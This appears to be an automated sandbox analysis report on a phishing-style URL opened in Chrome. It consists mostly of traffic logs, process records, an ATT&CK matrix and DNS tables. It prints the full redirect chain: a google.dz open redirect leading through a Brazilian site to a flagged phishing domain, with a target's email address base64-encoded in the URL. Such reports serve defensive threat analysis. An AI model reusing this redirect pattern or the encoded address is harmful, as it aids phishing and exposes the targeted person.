Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 20.190.147.10:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49862 version: TLS 1.2
Source: classification engineClassification label: mal52.win@18/2@12/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2256,i,11265624852197231515,14874182211913071364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2256,i,11265624852197231515,14874182211913071364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567652 URL: https://google.dz/url?q=lbj... Startdate: 03/12/2024 Architecture: WINDOWS Score: 52 15 www.google.dz 2->15 27 Suricata IDS alerts for network traffic 2->27 29 AI detected suspicious Javascript 2->29 7 chrome.exe 1 2->7         started        10 chrome.exe 2->10         started        signatures3 process4 dnsIp5 17 192.168.2.6, 443, 49382, 49703 unknown unknown 7->17 19 239.255.255.250 unknown Reserved 7->19 12 chrome.exe 7->12         started        process6 dnsIp7 21 cjcjjdkdkfkfje.gharelokhana.com 164.92.191.86, 443, 49761, 49762 ASN-DPSDUS United States 12->21 23 handlingservice.com.br 191.252.162.52, 443, 49745, 49760 LocawebServicosdeInternetSABR Brazil 12->23 25 3 other IPs or domains 12->25

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%820%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://handlingservice.com.br/favicon.ico0%Avira URL Cloudsafe
https://cjcjjdkdkfkfje.gharelokhana.com/?km=YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%C3%A3%C2%80%C2%82$$$%C3%A3%C2%80%C2%820%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.100
truefalse
    high
    google.dz
    142.251.37.195
    truefalse
      high
      cjcjjdkdkfkfje.gharelokhana.com
      164.92.191.86
      truetrue
        unknown
        www.google.dz
        172.217.171.195
        truefalse
          high
          handlingservice.com.br
          191.252.162.52
          truefalse
            unknown
            fp2e7a.wpc.phicdn.net
            192.229.221.95
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
